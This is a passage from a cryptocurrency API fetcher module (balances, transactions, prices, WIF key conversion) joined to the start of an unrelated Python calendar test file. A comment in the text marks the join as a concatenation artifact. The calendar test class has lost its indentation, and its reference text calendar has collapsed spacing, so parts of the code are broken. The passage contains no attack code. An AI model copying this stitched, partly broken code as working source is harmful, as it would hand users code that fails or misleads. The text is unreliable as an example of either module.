        # NOTE(review): declared @classmethod but the first parameter is
        # named `self`; it actually receives the class object.
        return "%s, %s, %s" % (
            result['hash'], result['block_number'], result['size']
        )
class HistoricalTransactions(AutoFallbackFetcher):
    """Fetcher returning an address's transaction history, newest first."""

    def action(self, crypto, address=None, addresses=None):
        # `address` wins if both are passed (it is checked last).
        if addresses:
            method_name = "get_transactions_multi"
            kwargs = dict(addresses=addresses)
        if address:
            method_name = "get_transactions"
            kwargs = dict(address=address)
        # NOTE(review): if neither argument is passed, `method_name` is
        # unbound and the next line raises UnboundLocalError.
        txs = self._try_services(method_name, crypto, **kwargs)
        return sorted(txs, key=lambda tx: tx['date'], reverse=True)

    def no_service_msg(self, crypto, address=None, addresses=None):
        return "Could not get transactions for: %s:%s" % (crypto, address or ', '.join(addresses))

    @classmethod
    def strip_for_consensus(cls, results):
        # Reduce each service's tx list to a canonical string so results from
        # different services can be compared for consensus.
        stripped = []
        for result in results:
            result.sort(key=lambda x: x['date'])
            stripped.append(
                ", ".join(
                    ["[id: %s, amount: %s]" % (x['txid'], x['amount']) for x in result]
                )
            )
        return stripped
class UnspentOutputs(AutoFallbackFetcher):
    """Fetcher returning an address's unspent outputs, sorted by output."""

    def action(self, crypto, address=None, addresses=None):
        # `address` wins if both are passed (it is checked last).
        if addresses:
            method_name = "get_unspent_outputs_multi"
            kwargs = dict(addresses=addresses)
        if address:
            method_name = "get_unspent_outputs"
            kwargs = dict(address=address)
        # NOTE(review): if neither argument is passed, `method_name` is
        # unbound and the next line raises UnboundLocalError.
        utxos = self._try_services(method_name, crypto=crypto, **kwargs)
        return sorted(utxos, key=lambda x: x['output'])

    def no_service_msg(self, crypto, address=None, addresses=None):
        return "Could not get unspent outputs for: %s:%s" % (crypto, address or ', '.join(addresses))

    @classmethod
    def strip_for_consensus(cls, results):
        # Reduce each service's utxo list to a canonical string so results
        # from different services can be compared for consensus.
        stripped = []
        for result in results:
            result.sort(key=lambda x: x['output'])
            stripped.append(
                ", ".join(
                    ["[output: %s, value: %s]" % (x['output'], x['amount']) for x in result]
                )
            )
        return stripped
class CurrentPrice(AutoFallbackFetcher):
    """Fetcher returning the current exchange rate for a crypto/fiat pair."""

    def action(self, crypto, fiat, convert_to=None):
        if crypto.lower() == fiat.lower():
            # identity conversion: no service call needed
            # NOTE(review): returns a (rate, source) tuple here, while the
            # paths below return whatever _try_services yields -- confirm
            # callers handle both shapes.
            return (1.0, 'math')
        ret = self._try_services('get_current_price', crypto=crypto, fiat=fiat)
        if convert_to:
            # re-denominate via the fiat-to-fiat exchange rate
            return ret / get_fiat_exchange_rate(from_fiat=fiat, to_fiat=convert_to)
        return ret

    def simplify_for_average(self, value):
        # value is passed through unchanged for averaging mode
        return value

    def no_service_msg(self, crypto, fiat):
        # NOTE(review): signature omits convert_to, unlike action()
        return "Can not find current price for %s->%s" % (crypto, fiat)
class AddressBalance(AutoFallbackFetcher):
    """Fetcher returning confirmed balances for one or many addresses."""

    def action(self, crypto, address=None, addresses=None, confirmations=1):
        # Fix: with neither address nor addresses, `method_name` was unbound
        # and the _try_services call raised a confusing UnboundLocalError.
        if not address and not addresses:
            raise ValueError("Either address or addresses is required")
        kwargs = dict(crypto=crypto, confirmations=confirmations)
        if address:
            method_name = "get_balance"
            kwargs['address'] = address
        if addresses:
            # addresses wins if both are passed (checked last, as before)
            method_name = "get_balance_multi"
            kwargs['addresses'] = addresses
        results = self._try_services(method_name, **kwargs)
        if addresses and 'total_balance' not in results:
            # multi-address results are per-address; add a convenience total
            results['total_balance'] = sum(results.values())
        return results

    def no_service_msg(self, crypto, address=None, addresses=None, confirmations=1):
        return "Could not get confirmed address balance for: %s" % crypto
class PushTx(AutoFallbackFetcher):
    """Fetcher that broadcasts a raw (hex encoded) transaction."""

    def action(self, crypto, tx_hex):
        return self._try_services("push_tx", crypto=crypto, tx_hex=tx_hex)

    def no_service_msg(self, crypto, tx_hex):
        return "Could not push this %s transaction." % crypto
class HistoricalPrice(object):
    """
    This one doesn't inherit from AutoFallbackFetcher because there is only one
    historical price API service at the moment (Quandl).
    """
    def __init__(self, responses=None, verbose=False):
        self.service = Quandl(responses, verbose=verbose)

    def action(self, crypto, fiat, at_time):
        """Return (price, source, date) for the pair at the given time."""
        crypto = crypto.lower()
        fiat = fiat.lower()
        if crypto == 'btc' or fiat == 'btc':
            # a btc pair can be answered with a single request
            return self.service.get_historical(crypto, fiat, at_time)
        # Neither side is btc: route through btc with two requests and
        # multiply the two rates together.
        crypto_to_btc, source1, date1 = self.service.get_historical(crypto, 'btc', at_time)
        btc_to_fiat, source2, date2 = self.service.get_historical('btc', fiat, at_time)
        combined_source = "%s x %s" % (source1, source2)
        return (crypto_to_btc * btc_to_fiat), combined_source, date1

    @property
    def responses(self):
        # expose the underlying service's raw responses for debugging
        return self.service.responses
def _get_all_services(crypto=None):
    """
    Go through the crypto_data structure and return a list of all (unique)
    installed services, sorted by class name. Optionally filter by
    crypto-currency.
    """
    if not crypto:
        # no currency specified, get all services
        to_iterate = crypto_data.items()
    else:
        # limit to one currency
        to_iterate = [(crypto, crypto_data[crypto])]

    found = set()
    for currency, data in to_iterate:
        if 'services' not in data:
            continue  # incomplete data listing
        if currency == '':
            continue  # template entry, not a real currency
        # Fix: build the set directly instead of temporarily deleting and
        # re-adding the 'current_price' key on the shared crypto_data
        # structure (which was not exception-safe and mutated global state).
        for mode, service_list in data['services'].items():
            if mode == 'current_price':
                # price services are defined as a dictionary keyed by fiat;
                # all other services are defined as a list.
                for sublist in service_list.values():
                    found.update(sublist)
            else:
                found.update(service_list)

    return sorted(found, key=lambda x: x.__name__)
# Snapshot of every installed service class, computed once at import time.
ALL_SERVICES = _get_all_services()
def service_table(format='simple'):
    """
    Returns a string depicting all services currently installed.
    With format='html', homepage URLs are rendered as links.
    """
    if format == 'html':
        linkify = lambda x: "<a href='{0}' target='_blank'>{0}</a>".format(x)
    else:
        linkify = lambda x: x

    rows = []
    for service in sorted(ALL_SERVICES, key=lambda s: s.service_id):
        homepage = service.api_homepage.format(
            domain=service.domain, protocol=service.protocol
        )
        rows.append([
            service.service_id,
            service.__name__,
            linkify(homepage),
            ", ".join(service.supported_cryptos or []),
        ])
    return tabulate(rows, headers=['ID', 'Name', 'URL', 'Supported Currencies'], tablefmt=format)
def wif_to_hex(wif):
    """
    Convert a WIF encoded private key into the raw hex encoded private key.
    This function works for all bitcoin-API compatible coins.
    """
    payload = b58decode_check(wif)[1:]  # drop the version byte
    return hexlify(payload).upper()
class ExchangeUniverse(object):
    """
    Registry of the trading pairs supported by every installed service.

    On construction each service is asked for its pairs (strings of the form
    "crypto-fiat"); services without get_pairs are skipped and other
    failures are printed and ignored (best effort discovery).
    """
    def __init__(self, verbose=False):
        self.all_pairs = {}
        for Service in ALL_SERVICES:
            try:
                self.all_pairs[Service] = Service(verbose=verbose).get_pairs()
            except NotImplementedError:
                pass
            except Exception as exc:
                # one broken service should not abort discovery
                print("%s returned error: %s" % (Service.__name__, exc))

    def find_pair(self, crypto="", fiat="", verbose=False):
        """
        This utility is used to find an exchange that supports a given
        exchange pair. Either side may be left blank to match any currency
        on that side; at least one side is required.
        """
        if not crypto and not fiat:
            raise Exception("Fiat or Crypto required")

        def is_matched(crypto, fiat, pair):
            if crypto and not fiat:
                return pair.startswith("%s-" % crypto)
            if crypto and fiat:
                # Fix: was `crypo`, a NameError whenever both sides were given.
                return pair == "%s-%s" % (crypto, fiat)
            if not crypto:
                return pair.endswith("-%s" % fiat)

        matched_pairs = {}
        for Service, pairs in self.all_pairs.items():
            matched = [p for p in pairs if is_matched(crypto, fiat, p)]
            if matched:
                matched_pairs[Service] = matched
        return matched_pairs

    def all_cryptos(self):
        """Return a sorted list of every crypto appearing in any pair."""
        all_cryptos = set()
        for Service, pairs in self.all_pairs.items():
            for pair in pairs:
                all_cryptos.add(pair.split("-")[0])
        return sorted(all_cryptos)

    def most_supported(self, skip_supported=False):
        """
        Rank cryptos by how many exchange pairs reference them, most first.
        With skip_supported=True, cryptos already in crypto_data are omitted.
        """
        counts = []
        for crypto in self.all_cryptos():
            if skip_supported and crypto in crypto_data:
                continue
            matched = self.find_pair(crypto=crypto)
            count = sum(len(x) for x in matched.values())
            counts.append([crypto, count])
        return sorted(counts, key=lambda x: x[1], reverse=True)
def wif_to_address(crypto, wif):
    # Derive the public address for a WIF-encoded private key, after checking
    # that the WIF's version prefix byte matches the requested currency.
    # NOTE(review): this redefinition shadows the earlier `wif_to_address`
    # in this module; this version is the one callers actually get.
    if is_py2:
        # py2: b58decode_check returns a str; convert the first byte to an int
        wif_byte = int(hexlify(b58decode_check(wif)[0]), 16)
    else:
        # py3: indexing bytes already yields an int
        wif_byte = b58decode_check(wif)[0]
    if not wif_byte == crypto_data[crypto.lower()]['private_key_prefix']:
        msg = 'WIF encoded with wrong prefix byte. Are you sure this is a %s address?' % crypto.upper()
        raise Exception(msg)
    address_byte = crypto_data[crypto.lower()]['address_version_byte']
    return privkey_to_address(wif, address_byte)
# ---- (removed stray '|' character: artifact of concatenating two unrelated source files)
import calendar
import unittest
from test import test_support
result_2004_text = """
2004
January February March
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 1 2 3 4 5 6 7
5 6 7 8 9 10 11 2 3 4 5 6 7 8 8 9 10 11 12 13 14
12 13 14 15 16 17 18 9 10 11 12 13 14 15 15 16 17 18 19 20 21
19 20 21 22 23 24 25 16 17 18 19 20 21 22 22 23 24 25 26 27 28
26 27 28 29 30 31 23 24 25 26 27 28 29 29 30 31
April May June
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 2 1 2 3 4 5 6
5 6 7 8 9 10 11 3 4 5 6 7 8 9 7 8 9 10 11 12 13
12 13 14 15 16 17 18 10 11 12 13 14 15 16 14 15 16 17 18 19 20
19 20 21 22 23 24 25 17 18 19 20 21 22 23 21 22 23 24 25 26 27
26 27 28 29 30 24 25 26 27 28 29 30 28 29 30
31
July August September
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 4 1 1 2 3 4 5
5 6 7 8 9 10 11 2 3 4 5 6 7 8 6 7 8 9 10 11 12
12 13 14 15 16 17 18 9 10 11 12 13 14 15 13 14 15 16 17 18 19
19 20 21 22 23 24 25 16 17 18 19 20 21 22 20 21 22 23 24 25 26
26 27 28 29 30 31 23 24 25 26 27 28 29 27 28 29 30
30 31
October November December
Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su Mo Tu We Th Fr Sa Su
1 2 3 1 2 3 4 5 6 7 1 2 3 4 5
4 5 6 7 8 9 10 8 9 10 11 12 13 14 6 7 8 9 10 11 12
11 12 13 14 15 16 17 15 16 17 18 19 20 21 13 14 15 16 17 18 19
18 19 20 21 22 23 24 22 23 24 25 26 27 28 20 21 22 23 24 25 26
25 26 27 28 29 30 31 29 30 27 28 29 30 31
"""
result_2004_html = """
<?xml version="1.0" encoding="ascii"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ascii" />
<link rel="stylesheet" type="text/css" href="calendar.css" />
<title>Calendar for 2004</title>
</head>
<body>
<table border="0" cellpadding="0" cellspacing="0" class="year">
<tr><th colspan="3" class="year">2004</th></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">January</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="sat">31</td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">February</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sun">1</td></tr>
<tr><td class="mon">2</td><td class="tue">3</td><td class="wed">4</td><td class="thu">5</td><td class="fri">6</td><td class="sat">7</td><td class="sun">8</td></tr>
<tr><td class="mon">9</td><td class="tue">10</td><td class="wed">11</td><td class="thu">12</td><td class="fri">13</td><td class="sat">14</td><td class="sun">15</td></tr>
<tr><td class="mon">16</td><td class="tue">17</td><td class="wed">18</td><td class="thu">19</td><td class="fri">20</td><td class="sat">21</td><td class="sun">22</td></tr>
<tr><td class="mon">23</td><td class="tue">24</td><td class="wed">25</td><td class="thu">26</td><td class="fri">27</td><td class="sat">28</td><td class="sun">29</td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">March</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="mon">1</td><td class="tue">2</td><td class="wed">3</td><td class="thu">4</td><td class="fri">5</td><td class="sat">6</td><td class="sun">7</td></tr>
<tr><td class="mon">8</td><td class="tue">9</td><td class="wed">10</td><td class="thu">11</td><td class="fri">12</td><td class="sat">13</td><td class="sun">14</td></tr>
<tr><td class="mon">15</td><td class="tue">16</td><td class="wed">17</td><td class="thu">18</td><td class="fri">19</td><td class="sat">20</td><td class="sun">21</td></tr>
<tr><td class="mon">22</td><td class="tue">23</td><td class="wed">24</td><td class="thu">25</td><td class="fri">26</td><td class="sat">27</td><td class="sun">28</td></tr>
<tr><td class="mon">29</td><td class="tue">30</td><td class="wed">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">April</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">May</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sat">1</td><td class="sun">2</td></tr>
<tr><td class="mon">3</td><td class="tue">4</td><td class="wed">5</td><td class="thu">6</td><td class="fri">7</td><td class="sat">8</td><td class="sun">9</td></tr>
<tr><td class="mon">10</td><td class="tue">11</td><td class="wed">12</td><td class="thu">13</td><td class="fri">14</td><td class="sat">15</td><td class="sun">16</td></tr>
<tr><td class="mon">17</td><td class="tue">18</td><td class="wed">19</td><td class="thu">20</td><td class="fri">21</td><td class="sat">22</td><td class="sun">23</td></tr>
<tr><td class="mon">24</td><td class="tue">25</td><td class="wed">26</td><td class="thu">27</td><td class="fri">28</td><td class="sat">29</td><td class="sun">30</td></tr>
<tr><td class="mon">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">June</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="tue">1</td><td class="wed">2</td><td class="thu">3</td><td class="fri">4</td><td class="sat">5</td><td class="sun">6</td></tr>
<tr><td class="mon">7</td><td class="tue">8</td><td class="wed">9</td><td class="thu">10</td><td class="fri">11</td><td class="sat">12</td><td class="sun">13</td></tr>
<tr><td class="mon">14</td><td class="tue">15</td><td class="wed">16</td><td class="thu">17</td><td class="fri">18</td><td class="sat">19</td><td class="sun">20</td></tr>
<tr><td class="mon">21</td><td class="tue">22</td><td class="wed">23</td><td class="thu">24</td><td class="fri">25</td><td class="sat">26</td><td class="sun">27</td></tr>
<tr><td class="mon">28</td><td class="tue">29</td><td class="wed">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">July</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="thu">1</td><td class="fri">2</td><td class="sat">3</td><td class="sun">4</td></tr>
<tr><td class="mon">5</td><td class="tue">6</td><td class="wed">7</td><td class="thu">8</td><td class="fri">9</td><td class="sat">10</td><td class="sun">11</td></tr>
<tr><td class="mon">12</td><td class="tue">13</td><td class="wed">14</td><td class="thu">15</td><td class="fri">16</td><td class="sat">17</td><td class="sun">18</td></tr>
<tr><td class="mon">19</td><td class="tue">20</td><td class="wed">21</td><td class="thu">22</td><td class="fri">23</td><td class="sat">24</td><td class="sun">25</td></tr>
<tr><td class="mon">26</td><td class="tue">27</td><td class="wed">28</td><td class="thu">29</td><td class="fri">30</td><td class="sat">31</td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">August</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="sun">1</td></tr>
<tr><td class="mon">2</td><td class="tue">3</td><td class="wed">4</td><td class="thu">5</td><td class="fri">6</td><td class="sat">7</td><td class="sun">8</td></tr>
<tr><td class="mon">9</td><td class="tue">10</td><td class="wed">11</td><td class="thu">12</td><td class="fri">13</td><td class="sat">14</td><td class="sun">15</td></tr>
<tr><td class="mon">16</td><td class="tue">17</td><td class="wed">18</td><td class="thu">19</td><td class="fri">20</td><td class="sat">21</td><td class="sun">22</td></tr>
<tr><td class="mon">23</td><td class="tue">24</td><td class="wed">25</td><td class="thu">26</td><td class="fri">27</td><td class="sat">28</td><td class="sun">29</td></tr>
<tr><td class="mon">30</td><td class="tue">31</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">September</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="wed">1</td><td class="thu">2</td><td class="fri">3</td><td class="sat">4</td><td class="sun">5</td></tr>
<tr><td class="mon">6</td><td class="tue">7</td><td class="wed">8</td><td class="thu">9</td><td class="fri">10</td><td class="sat">11</td><td class="sun">12</td></tr>
<tr><td class="mon">13</td><td class="tue">14</td><td class="wed">15</td><td class="thu">16</td><td class="fri">17</td><td class="sat">18</td><td class="sun">19</td></tr>
<tr><td class="mon">20</td><td class="tue">21</td><td class="wed">22</td><td class="thu">23</td><td class="fri">24</td><td class="sat">25</td><td class="sun">26</td></tr>
<tr><td class="mon">27</td><td class="tue">28</td><td class="wed">29</td><td class="thu">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr><tr><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">October</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="fri">1</td><td class="sat">2</td><td class="sun">3</td></tr>
<tr><td class="mon">4</td><td class="tue">5</td><td class="wed">6</td><td class="thu">7</td><td class="fri">8</td><td class="sat">9</td><td class="sun">10</td></tr>
<tr><td class="mon">11</td><td class="tue">12</td><td class="wed">13</td><td class="thu">14</td><td class="fri">15</td><td class="sat">16</td><td class="sun">17</td></tr>
<tr><td class="mon">18</td><td class="tue">19</td><td class="wed">20</td><td class="thu">21</td><td class="fri">22</td><td class="sat">23</td><td class="sun">24</td></tr>
<tr><td class="mon">25</td><td class="tue">26</td><td class="wed">27</td><td class="thu">28</td><td class="fri">29</td><td class="sat">30</td><td class="sun">31</td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">November</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="mon">1</td><td class="tue">2</td><td class="wed">3</td><td class="thu">4</td><td class="fri">5</td><td class="sat">6</td><td class="sun">7</td></tr>
<tr><td class="mon">8</td><td class="tue">9</td><td class="wed">10</td><td class="thu">11</td><td class="fri">12</td><td class="sat">13</td><td class="sun">14</td></tr>
<tr><td class="mon">15</td><td class="tue">16</td><td class="wed">17</td><td class="thu">18</td><td class="fri">19</td><td class="sat">20</td><td class="sun">21</td></tr>
<tr><td class="mon">22</td><td class="tue">23</td><td class="wed">24</td><td class="thu">25</td><td class="fri">26</td><td class="sat">27</td><td class="sun">28</td></tr>
<tr><td class="mon">29</td><td class="tue">30</td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td><td><table border="0" cellpadding="0" cellspacing="0" class="month">
<tr><th colspan="7" class="month">December</th></tr>
<tr><th class="mon">Mon</th><th class="tue">Tue</th><th class="wed">Wed</th><th class="thu">Thu</th><th class="fri">Fri</th><th class="sat">Sat</th><th class="sun">Sun</th></tr>
<tr><td class="noday"> </td><td class="noday"> </td><td class="wed">1</td><td class="thu">2</td><td class="fri">3</td><td class="sat">4</td><td class="sun">5</td></tr>
<tr><td class="mon">6</td><td class="tue">7</td><td class="wed">8</td><td class="thu">9</td><td class="fri">10</td><td class="sat">11</td><td class="sun">12</td></tr>
<tr><td class="mon">13</td><td class="tue">14</td><td class="wed">15</td><td class="thu">16</td><td class="fri">17</td><td class="sat">18</td><td class="sun">19</td></tr>
<tr><td class="mon">20</td><td class="tue">21</td><td class="wed">22</td><td class="thu">23</td><td class="fri">24</td><td class="sat">25</td><td class="sun">26</td></tr>
<tr><td class="mon">27</td><td class="tue">28</td><td class="wed">29</td><td class="thu">30</td><td class="fri">31</td><td class="noday"> </td><td class="noday"> </td></tr>
</table>
</td></tr></table></body>
</html>
"""
class OutputTestCase(unittest.TestCase):
    """Compare the text and HTML calendar formatters for the year 2004
    against the reference output stored in result_2004_text/result_2004_html."""
    def normalize_calendar(self, s):
        # Filters out locale dependant strings
        def neitherspacenordigit(c):
            # True for any character that carries locale-dependent text.
            return not c.isspace() and not c.isdigit()
        lines = []
        for line in s.splitlines(False):
            # Drop texts, as they are locale dependent.
            # NOTE: relies on Python 2 semantics -- filter() over a string
            # returns a (possibly empty, hence falsy) string of matches.
            if line and not filter(neitherspacenordigit, line):
                lines.append(line)
        return lines
    def test_output(self):
        # calendar.calendar() must match the reference, ignoring locale text.
        self.assertEqual(
            self.normalize_calendar(calendar.calendar(2004)),
            self.normalize_calendar(result_2004_text)
        )
    def test_output_textcalendar(self):
        # TextCalendar.formatyear() must reproduce the text reference exactly.
        self.assertEqual(
            calendar.TextCalendar().formatyear(2004).strip(),
            result_2004_text.strip()
        )
    def test_output_htmlcalendar(self):
        # HTMLCalendar.formatyearpage() must reproduce the HTML reference.
        self.assertEqual(
            calendar.HTMLCalendar().formatyearpage(2004).strip(),
            result_2004_html.strip()
        )
class CalendarTestCase(unittest.TestCase):
def test_isleap(self):
# Make sure that the return is right for a few years, and
# ensure that the return values are 1 or 0, not just true or
# false (see SF bug #485794). Specific additional tests may
# be appropriate; this tests a single "cycle".
self.assertEqual(calendar.isleap(2000), 1)
self.assertEqual(calendar.isleap(2001), 0)
self.assertEqual(calendar.isleap(2002), 0)
self.assertEqual(calendar.isleap(2003), 0)
def test_setfirstweekday(self):
self.assertRaises(ValueError, calendar.setfirstweekday, 'flabber')
self.assertRaises(ValueError, calendar.setfirstweekday, -1)
self.assertRaises(ValueError, calendar.setfirstweekday, 200)
orig = calendar.firstweekday()
calendar.setfirstweekday(calendar.SUNDAY)
self.assertEqual(calendar.firstweekday(), calendar.SUNDAY)
calendar.setfirstweekday(calendar.MONDAY)
self.assertEqual(calendar.firstweekday(), calendar.MONDAY)
calendar.setfirstweekday(orig)
def test_enumerateweekdays(self):
self.assertRaises(IndexError, calendar.day_abbr.__getitem__, -10)
self.assertRaises(IndexError, calendar.day_name.__getitem__, 10)
self.assertEqual(len([d for d in calendar.day_abbr]), 7)
def test_days(self):
for attr in "day_name", "day_abbr":
value = getattr(calendar, attr)
self.assertEqual(len(value), 7)
self.assertEqual(len(value[:]), 7)
# ensure they're all unique
self.assertEqual(len(set(value)), 7)
# verify it "acts like a sequence" in two forms of iteration
self.assertEqual(value[::-1], list(reversed(value)))
def test_months(self):
for attr in "month_name", "month_abbr":
value = getattr(calendar, attr)
self.assertEqual(len(value), 13)
self.assertEqual(len(value[:]), 13)
self.assertEqual(value[0], "")
# ensure they're all unique
self.assertEqual(len(set(value)), 13)
# verify it "acts like a sequence" in two forms of iteration
self.assertEqual(value[::-1], list(reversed(value)))
class MonthCalendarTestCase(unittest.TestCase):
    """Base class for the per-first-weekday layout checks.  Subclasses set
    the class attribute 'firstweekday'; it is installed module-wide for the
    duration of each test and restored afterwards."""
    def setUp(self):
        # Remember the module-wide setting so tearDown can restore it.
        self.oldfirstweekday = calendar.firstweekday()
        calendar.setfirstweekday(self.firstweekday)
    def tearDown(self):
        calendar.setfirstweekday(self.oldfirstweekday)
    def check_weeks(self, year, month, weeks):
        # Assert that monthcalendar(year, month) yields len(weeks) weeks and
        # that each week holds the expected number of real (non-zero) days.
        cal = calendar.monthcalendar(year, month)
        self.assertEqual(len(cal), len(weeks))
        for expected, week in zip(weeks, cal):
            self.assertEqual(expected, sum(day != 0 for day in week))
class MondayTestCase(MonthCalendarTestCase):
    """Week-length checks with Monday as the first day of the week."""
    firstweekday = calendar.MONDAY
    def test_february(self):
        # (year, per-week day counts): 28- and 29-day Februaries starting
        # on various weekdays.
        cases = (
            (1999, (7, 7, 7, 7)),        # 28 days, starts on monday
            (2005, (6, 7, 7, 7, 1)),     # 28 days, starts on tuesday
            (1987, (1, 7, 7, 7, 6)),     # 28 days, starts on sunday
            (1988, (7, 7, 7, 7, 1)),     # 29 days, starts on monday
            (1972, (6, 7, 7, 7, 2)),     # 29 days, starts on tuesday
            (2004, (1, 7, 7, 7, 7)),     # 29 days, starts on sunday
        )
        for year, weeks in cases:
            self.check_weeks(year, 2, weeks)
    def test_april(self):
        # 30-day month starting on various weekdays.
        cases = (
            (1935, (7, 7, 7, 7, 2)),     # starts on monday
            (1975, (6, 7, 7, 7, 3)),     # starts on tuesday
            (1945, (1, 7, 7, 7, 7, 1)),  # starts on sunday
            (1995, (2, 7, 7, 7, 7)),     # starts on saturday
            (1994, (3, 7, 7, 7, 6)),     # starts on friday
        )
        for year, weeks in cases:
            self.check_weeks(year, 4, weeks)
    def test_december(self):
        # 31-day month starting on various weekdays.
        cases = (
            (1980, (7, 7, 7, 7, 3)),     # starts on monday
            (1987, (6, 7, 7, 7, 4)),     # starts on tuesday
            (1968, (1, 7, 7, 7, 7, 2)),  # starts on sunday
            (1988, (4, 7, 7, 7, 6)),     # starts on thursday
